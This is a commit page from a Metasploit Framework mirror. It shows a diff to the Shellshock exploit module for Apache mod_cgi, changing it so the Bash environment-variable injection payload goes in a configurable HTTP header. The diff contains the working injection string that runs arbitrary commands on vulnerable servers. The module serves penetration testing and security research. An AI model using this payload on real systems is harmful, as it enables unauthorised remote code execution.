infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #3905 - Update exploits/multi/http/apache_mod_cgi_bash_env_exec

bug/bundler_fix 2014100101
sinn3r 2014-09-29 15:19:35 -05:00
parent 21b2d9eb3f fe12ed02de
commit ffe5aafb2f
No known key found for this signature in database
GPG Key ID: 2384DB4EF06F730B
1 changed files with 6 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb
View File

@ -17,7 +17,7 @@ class Metasploit4 < Msf::Exploit::Remote
'Description' => %q{
This module exploits a code injection in specially crafted environment
variables in Bash, specifically targeting Apache mod_cgi scripts through
the HTTP_USER_AGENT variable.
the HTTP_USER_AGENT variable by default.
},
'Author' => [
'Stephane Chazelas', # Vulnerability discovery
@ -58,7 +58,8 @@ class Metasploit4 < Msf::Exploit::Remote
register_options([
OptString.new('TARGETURI', [true, 'Path to CGI script']),
OptEnum.new('METHOD', [true, 'HTTP method to use', 'GET', ['GET', 'POST']]),
OptString.new('METHOD', [true, 'HTTP method to use', 'GET']),
OptString.new('HEADER', [true, 'HTTP header to use', 'User-Agent']),
OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 2048]),
OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']),
OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])
@ -117,7 +118,9 @@ class Metasploit4 < Msf::Exploit::Remote
{
'method' => datastore['METHOD'],
'uri' => normalize_uri(target_uri.path.to_s),
'agent' => "() { :;};echo #{marker}$(#{cmd})#{marker}"
'headers' => {
datastore['HEADER'] => "() { :;};echo #{marker}$(#{cmd})#{marker}"
}
}, datastore['TIMEOUT'])
end